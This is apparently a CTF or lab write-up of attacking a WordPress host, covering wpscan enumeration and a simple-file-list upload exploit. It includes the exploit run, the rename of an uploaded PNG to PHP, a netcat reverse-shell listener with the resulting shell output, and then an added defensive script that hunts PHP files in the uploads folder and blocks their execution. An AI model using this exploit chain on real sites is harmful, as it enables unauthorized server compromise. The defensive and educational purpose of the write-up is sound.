# 3 :80 wordpress + exploit

```
$ wpscan --url http://192.168.197.105
[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.46 (Unix) PHP/7.4.10
 |  - X-Powered-By: PHP/7.4.10

[+] WordPress readme found: http://192.168.197.105/readme.html

[+] Upload directory has listing enabled: http://192.168.197.105/wp-content/uploads/

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).

[+] WordPress theme in use: news-vibrant
 | Location: http://192.168.197.105/wp-content/themes/news-vibrant/
 | Readme: http://192.168.197.105/wp-content/themes/news-vibrant/readme.txt
 | [!] The version is out of date, the latest version is 1.0.13
 | Version: 1.0.12 (80% confidence)
 
[i] Plugin(s) Identified:
[+] simple-file-list
 | Location: http://192.168.197.105/wp-content/plugins/simple-file-list/
 | [!] The version is out of date, the latest version is 4.4.7
 | Version: 4.2.2 (100% confidence)
 
[+] tutor
 | Location: http://192.168.197.105/wp-content/plugins/tutor/
 | [!] The version is out of date, the latest version is 1.9.7
 | Version: 1.5.3 (80% confidence)
 
[i] User(s) Identified:
[+] admin

# simple-file-list v4.2.2 has public exploits: unauthenticated upload of an
# image-wrapped PHP file, then a rename to .php through the plugin itself
https://www.exploit-db.com/exploits/48449
Using https://www.exploit-db.com/exploits/48979

$ python3 48979.py http://192.168.197.105/
[ ] File 5527.png generated with password: 31f4eeea51f385510ec7328adf61ebd4
[ ] File uploaded at http://192.168.197.105//wp-content/uploads/simple-file-list/5527.png
[ ] File moved to http://192.168.197.105//wp-content/uploads/simple-file-list/5527.php
[+] Exploit seem to work.
[*] Confirmning ...

$ nc -lvnp 3306
listening on [any] 3306 ...
connect to [192.168.49.197] from (UNKNOWN) [192.168.197.105] 43822
bash: cannot set terminal process group (348): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
http
uid=33(http) gid=33(http) groups=33(http)
nukem
Linux nukem 5.8.9-arch2-1 #1 SMP PREEMPT Sun, 13 Sep 2020 23:44:55 +0000 x86_64 GNU/Linux
```
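The exploit output above shows the artefact it leaves behind: a `.png` uploaded into `wp-content/uploads/simple-file-list/` and then renamed to `.php`, which Apache happily executes. The script below is an added example (not from the writeup or from the plugin) for the blue-team side of the same finding: it hunts for PHP-like files under an uploads tree and drops an Apache 2.4 `.htaccess` that refuses to execute scripts there. The directory layout and file names it creates are a constructed sample that mimics the post-exploit state; real paths differ.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Hunts for web shells left in wp-content/uploads and hardens the directory.

# List PHP-like files under an uploads directory. Upload trees should only
# hold static media, so every hit deserves triage (sorted for stable output).
find_php_in_uploads() {
    uploads_dir="$1"
    find "$uploads_dir" -type f \
        \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' -o -iname '*.php[3-7]' \) \
        | sort
}

# Write a hardening .htaccess into the uploads directory (Apache 2.4 syntax).
# Assumes the vhost has AllowOverride set so FilesMatch/Require are honoured;
# otherwise put the same block in the vhost config under a <Directory>.
write_uploads_htaccess() {
    uploads_dir="$1"
    cat > "$uploads_dir/.htaccess" <<'EOF'
# Never execute scripts from the uploads tree
<FilesMatch "\.(php|phtml|phar|php[3-7])$">
    Require all denied
</FilesMatch>
EOF
}

# Constructed sample tree: a renamed web shell (as in the exploit output)
# next to its original .png and a legitimate image. Returns the temp path.
make_demo_tree() {
    demo="$(mktemp -d)"
    mkdir -p "$demo/simple-file-list" "$demo/2020/09"
    printf 'PNG' > "$demo/2020/09/logo.png"
    printf 'PNG' > "$demo/simple-file-list/5527.png"
    printf '<?php /* constructed placeholder, not a real shell */ ?>' \
        > "$demo/simple-file-list/5527.php"
    printf '%s' "$demo"
}

demo_dir="$(make_demo_tree)"
echo "PHP files found under $demo_dir:"
find_php_in_uploads "$demo_dir"
write_uploads_htaccess "$demo_dir"
echo "Hardening written to $demo_dir/.htaccess"
```

On a live box, point `find_php_in_uploads` at the real `wp-content/uploads` and compare the file mtimes against the access log for the `ee-upload-engine.php` / `ee-file-engine.php` requests; the `.htaccess` only blocks execution, so the uploaded file still has to be removed.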
